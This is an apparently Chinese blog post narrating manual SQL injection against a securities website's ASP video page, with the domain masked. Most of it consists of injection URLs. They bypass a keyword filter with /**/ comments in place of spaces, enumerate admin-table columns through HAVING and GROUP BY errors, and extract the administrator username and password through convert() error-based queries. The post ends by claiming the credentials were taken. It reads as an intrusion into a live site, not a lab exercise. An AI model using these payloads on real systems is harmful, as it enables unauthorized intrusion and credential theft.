简单手注证券网

没技术，纯粹是温习下手注。

注入点：http://www.xxxx.cn/viewvideo.asp?id=74

加 ' ，报错

加 and 1=1、and 1=2验证，竟然还有防注入

以注释代替空格，即/**/and/**/1=1、/**/and/**/1=2，绕过了验证

检查下是否存在 admin 表，http://www.xxxx.cn/viewvideo.asp?id=74/**/and/**/exists(select/**/*/**/from/**/admin)

返回正常，存在 admin 表。

ok，接下来爆列名，http://www.xxxx.cn/viewvideo.asp?id=74;select/**/*/**/from/**/admin/**/having/**/1=1;--

然后，http://www.xxxx.cn/viewvideo.asp?id=74;select/**/*/**/from/**/admin/**/group/**/by/**/id/**/having/**/1=1;--

继续爆，http://www.xxxx.cn/viewvideo.asp?id=74;select/**/*/**/from/**/admin/**/group/**/by/**/id,username/**/having/**/1=1;--

http://www.xxxx.cn/viewvideo.asp?id=74;select/**/*/**/from/**/admin/**/group/**/by/**/id,username,password/**/having/**/1=1;--

应该是所有列都爆完了，利用转换错误爆数据。

www.xxxx.cn/viewvideo.asp?id=74/**/and/**/1=convert(int,(select/**/top/**/1/**/username/**/from/**/admin));--

www.xxxx.cn/viewvideo.asp?id=74/**/and/**/1=convert(int,(select/**/top/**/1/**/password/**/from/**/admin));--

ok，username、password到手